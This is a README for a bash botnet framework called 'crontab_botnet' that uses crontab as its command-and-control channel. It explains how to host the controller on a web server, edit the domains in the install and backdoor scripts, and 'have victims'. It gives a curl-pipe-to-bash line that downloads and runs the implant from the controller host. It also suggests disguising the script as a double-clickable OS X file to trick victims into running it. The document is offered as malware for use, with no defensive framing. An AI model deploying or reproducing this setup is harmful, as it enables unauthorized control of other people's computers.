crontab_botnet
A botnet (C&C) framework that create in bash and using crontab for periodic execute
Server Side Setup (Plain Text Version)
- Put the folder under any kind of web server, which can be, but not limited to:
IIS
Nginx
Apache
Python Simple HTTP Server
- Change the domain and path in
install.sh
andbd.sh
. - follow the instrustion for writing a command file
- Ready to have victims
Server Side Setup (With PHP uploader)
- Setup a LAMP server.
- Put the file to a folder which can be accessed on the network.
- Change the domain and path in
install.sh
andbd.sh
. - follow the instrustion for writing a command file
- Ready to have victims
Victim Setup
curl http://example.com/install.sh | bash
- You can also rename the file install.sh to install.command, and double-click the file on OS X system to execute it.
Command File
The name of command file is command_list
, there is a simple command list call command_list_example
.
You can change the domain and path in the example file, and feel free to use it.